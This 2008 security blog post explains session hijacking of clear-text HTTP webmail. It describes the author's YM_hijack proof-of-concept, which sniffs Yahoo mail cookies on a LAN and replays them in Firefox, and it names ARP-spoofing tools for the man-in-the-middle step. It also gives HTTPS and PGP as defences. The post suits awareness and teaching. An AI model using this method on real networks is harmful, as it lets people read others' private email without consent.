Clear text email unsecurity (+ PoC)
There are many people who use public available email systems like Yahoo mail, Hotmail, Gmail (HTTP). In this post you will see how easy it is to gain access to someone’s email session by exploiting the clear-text HTTP protocol. You can also find a tool I wrote – YM_hijack – which is a proof of concept of the theory described.
A little bit of theory
Web servers can identify a client through a piece of data that it sends called cookie. After the client authenticates itself to the server (by username and password) , the server assignes unique cookies to that client. When the client makes a request to the server using those cookies, the server knows that he is who he pretends to be and allows him to access personal data.
Most web-based email systems use the mechanism described above and most of them do not encrypt their traffic. As you know, HTTP is a clear text protocol and anything sent in the network using HTTP can be sniffed and interpreted.
So, in a LAN environment, by using a sniffer and a man-in-the-middle tool you can get the cookies used for session identification and use them in your own browser to impersonate the real cookie owner. I think the image below clarifies the scenario.
Proof of concept – the automatic way
YM_hijack is a tool that automates the process described in the picture above. It must be run on the “Man in the Middle” host (see the picture). It does not have any MITM (man in the middle) capabilities so, in order to do that, you must use another tool like Cain or Ettercap or arpspoof or macof.
Prerequisites (for YM_hijack.exe): Windows XP, Mozilla Firefox (2 or above)
How does it work?
- Make yourself Man-in-the-middle
- Start YM_hijack.exe (or the python version) which does the following:
- Sniff packets from the network destined for tcp port 80
- Extract HTTP payload and search for Yahoo mail specific cookies (Y, B, T)
- Create a new Firefox profile named after the IP address of the originator
- Create the cookies.txt file in the newly created profile’s folder
- Start a new instance of Firefox with the new profile
- Enter directly into the Yahoo mail session of the ‘poor guy’
You can find more details by studying the source code (for python speakers).
- use HTTPS during the entire session (Gmail has an option to do that)
- encrypt your email content using PGP or a similar tool
Think twice before using/choosing the email, especially with confidential information!
This entry was posted on September 5, 2008 at 12:55 pm and is filed under Tools (StormSecurity) with tags cleartext email, cookies, email hijack, yahoo mail, yahoo session hijack. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.